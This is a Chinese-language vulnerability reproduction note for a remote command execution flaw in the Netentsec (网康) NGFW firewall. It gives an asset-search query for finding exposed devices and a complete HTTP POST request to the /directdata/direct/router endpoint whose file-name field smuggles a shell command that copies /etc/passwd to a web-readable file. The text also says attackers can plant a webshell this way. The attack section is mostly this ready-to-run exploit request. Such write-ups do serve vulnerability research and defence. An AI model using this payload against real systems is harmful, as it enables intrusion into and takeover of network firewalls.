# 网康下一代防火墙远程命令执行漏洞

# 一、漏洞简介
网康下一代防火墙(NGFW) 是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。凭借超强的应用识别能力，下一代防火墙可深入洞察网络流量中的用户、应用和内容，借助全新的高性能单路径异构并行处理引擎，在互联网出口、数据中心边界、应用服务前端等场景提供高效的应用层一体化安全防护帮助用户安全地开展业务并降低安全成本。该设备存在远程命令执行漏洞，通过此漏洞攻击者可远程写入webshell木马，远程控制防火墙。

# 二、影响版本
+ 网康下一代防火墙(NGFW)

# 三、资产测绘
+ hunter`app.name="网康 NGFW"`
+ 特征

![1700672214892-89badb4c-3b88-4fad-9bc7-d88920136c28.png](./img/yXZacA-Wy_HtI0DL/1700672214892-89badb4c-3b88-4fad-9bc7-d88920136c28-725692.png)

# 四、漏洞复现
执行命令`cat /etc/passwd`,将命令执行结果写入`/var/www/html/stc.txt`

```python
POST /directdata/direct/router HTTP/1.1
Host: xx.xx.xx.xx
Cookie: PHPSESSID=mrii60g5vlu8hnen3v0cdk13t6; ys-active_page=s%3A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/json
Content-Length: 172

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/stc.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
```

获取命令执行结果

```python
/stc.txt
```

![1700672285345-7cc2adaa-94f7-4c3c-bd2f-7cc73470a49f.png](./img/yXZacA-Wy_HtI0DL/1700672285345-7cc2adaa-94f7-4c3c-bd2f-7cc73470a49f-238968.png)



> 更新: 2024-02-29 23:57:15  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rp9svkal7uuo5is6>